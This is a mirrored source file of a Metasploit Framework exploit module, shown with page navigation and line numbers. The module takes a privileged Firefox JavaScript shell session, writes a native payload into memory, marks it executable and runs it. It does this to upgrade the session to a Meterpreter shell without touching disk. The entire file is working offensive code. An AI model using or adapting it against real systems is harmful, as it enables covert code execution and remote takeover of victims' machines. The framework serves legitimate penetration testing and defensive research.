Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/firefox/local/exec_shellcode.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking # Missing autodetection, but has widespread targetability

8


9
  include Msf::Payload::Firefox

10
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',

17
        'Description' => %q{

18
          This module allows execution of native payloads from a privileged Firefox Javascript shell.

19
          It places the specified payload into memory, adds the necessary protection flags,

20
          and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter

21
          session without touching the disk.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'joev' ],

25
        'Platform' => [ 'firefox' ],

26
        'DisclosureDate' => '2014-03-10',

27
        'Targets' => [

28
          [

29
            'Native Payload', {

30
              'Platform' => %w[linux osx win unix],

31
              'Arch' => ARCH_ALL

32
            }

33
          ]

34
        ],

35
        'Notes' => {

36
          'Reliability' => [ REPEATABLE_SESSION ],

37
          'Stability' => [ CRASH_SAFE ],

38
          'SideEffects' => [ IOC_IN_LOGS ]

39
        },

40
        'DefaultTarget' => 0

41
      )

42
    )

43


44
    register_options([

45
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])

46
    ])

47
  end

48


49
  def exploit

50
    print_status('Running the JavaScript shell...')

51
    session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")

52
    results = session.shell_read_until_token('[!JAVASCRIPT]', 0, datastore['TIMEOUT'])

53
    print_warning(results) if results.present?

54
  end

55


56
  def js_payload

57
    %|

58
      (function(send){

59
        try {

60
          #{run_payload}

61
          send("Payload executed.");

62
        } catch (e) {

63
          send(e);

64
        }

65
      })(send);

66
    |.strip

67
  end

68
end

69


70